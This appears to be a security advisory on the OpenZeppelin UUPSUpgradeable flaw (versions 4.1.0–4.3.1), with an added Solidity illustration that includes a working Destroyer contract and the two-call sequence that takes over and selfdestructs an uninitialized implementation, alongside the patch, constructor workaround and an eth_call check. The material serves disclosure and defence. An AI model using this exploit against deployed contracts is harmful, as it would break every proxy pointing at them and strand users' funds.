PT-2021-24448 · OpenZeppelin · OpenZeppelin Contracts, OpenZeppelin Contracts Upgradeable

Published: 2021-09-15 · Updated: 2021-09-15

Severity: None (no severity ratings or metrics are available; when they are, the corresponding info on this page will be updated).
Name of the Vulnerable Software and Affected Versions: @openzeppelin/contracts versions prior to 4.3.2; @openzeppelin/contracts-upgradeable versions prior to 4.3.2. UUPSUpgradeable first shipped in 4.1.0, so the affected releases are 4.1.0 through 4.3.1.
Description: The issue affects upgradeable contracts using UUPSUpgradeable. The implementation contract behind a UUPS proxy is normally deployed without ever being initialized itself (only the proxies are), so anyone can call its initializer and become its owner. The upgrade functions (upgradeTo and upgradeToAndCall) can then be invoked directly on the implementation rather than through a proxy; upgradeToAndCall delegatecalls into caller-supplied code in the implementation's own context, which can selfdestruct the implementation and leave every proxy that delegates to it without code.
Recommendations: For versions prior to 4.3.2, update to version 4.3.2 of @openzeppelin/contracts and @openzeppelin/contracts-upgradeable; that release adds an onlyProxy check to upgradeTo and upgradeToAndCall, so they revert unless called through an active ERC-1967 proxy. The fix only reaches implementations compiled and deployed with the patched library, so implementations already on-chain stay exposed until their proxies are upgraded to a patched implementation. As a temporary workaround for those, initialize the implementation contract using UUPSUpgradeable by invoking its initializer function, usually called initialize, on the implementation's own address (calling it through the proxy initializes the proxy's storage and does nothing for the implementation).
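Worked illustration, added here; this is not code from the advisory or from the OpenZeppelin library. It assumes @openzeppelin/contracts-upgradeable from the affected range (4.1.0 to 4.3.1) is installed, and the contract names VaultV1, Destroyer and VaultV1Initialized are hypothetical. It shows the usual implementation shape, what the uninitialized implementation allows, and the workaround from the Recommendations above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not OpenZeppelin's own code. Assumes @openzeppelin/contracts-upgradeable
// from the affected range (4.1.0 to 4.3.1) is installed. VaultV1, Destroyer and
// VaultV1Initialized are hypothetical names chosen for this illustration.
import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";
import "@openzeppelin/contracts-upgradeable/proxy/utils/UUPSUpgradeable.sol";
import "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";

// 1. The usual UUPS implementation shape. Each proxy is initialized by calling initialize()
//    through the proxy, but the implementation contract's own storage is normally never
//    initialized: on the bare implementation, owner() is still address(0) and initialize()
//    is open to anyone.
contract VaultV1 is Initializable, UUPSUpgradeable, OwnableUpgradeable {
    uint256 public totalDeposits;

    function initialize() public initializer {
        __Ownable_init();          // owner = msg.sender, whoever that is
        __UUPSUpgradeable_init();
    }

    function deposit() external payable {
        totalDeposits += msg.value;
    }

    // Upgrades are gated on the owner. On the bare implementation that is
    // whoever called initialize() first.
    function _authorizeUpgrade(address) internal override onlyOwner {}
}

// 2. What the uninitialized implementation allows before 4.3.2 (two calls from any account,
//    sent to the implementation address impl, not to a proxy):
//      VaultV1(impl).initialize();                       // caller becomes owner of impl
//      VaultV1(impl).upgradeToAndCall(address(destroyer), abi.encodeWithSignature("kill()"));
//    upgradeToAndCall delegatecalls into the new "implementation" in impl's own context, so
//    kill() selfdestructs impl itself; every proxy that delegates to impl then points at an
//    address with no code. upgradeTo(address) is included because the affected versions run
//    a rollback test that delegatecalls upgradeTo(oldImplementation) on the new implementation
//    and checks the ERC-1967 slot afterwards; if that call reverted, the whole transaction
//    (selfdestruct included) would be undone.
contract Destroyer {
    // ERC-1967 implementation slot: bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
    bytes32 private constant IMPLEMENTATION_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    function upgradeTo(address newImplementation) external {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }

    function kill() external {
        selfdestruct(payable(msg.sender));
    }
}

// 3. The workaround for deployments that cannot move to 4.3.2 yet: initialize the
//    implementation itself. Running the initializer modifier in the constructor marks the
//    implementation's own storage as initialized in the same transaction that deploys it,
//    so there is no window in which anyone else can call initialize() on it. Proxies are
//    not affected, because a constructor never executes in a proxy's context; each proxy is
//    still set up through its own initialize() call. The annotation tells the OpenZeppelin
//    Upgrades plugins that the constructor is intentional.
contract VaultV1Initialized is VaultV1 {
    /// @custom:oz-upgrades-unsafe-allow constructor
    constructor() initializer {}
}
```

To check an implementation that is already on-chain, simulate a call to initialize() against the implementation's own address with eth_call (no transaction is sent): if the simulation succeeds instead of reverting with "Initializable: contract is already initialized", the implementation is still open and the workaround has not been applied to it.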

Related Identifiers

GHSA-Q4H9-46XG-M3X9

Affected Products

@openzeppelin/contracts
@openzeppelin/contracts-upgradeable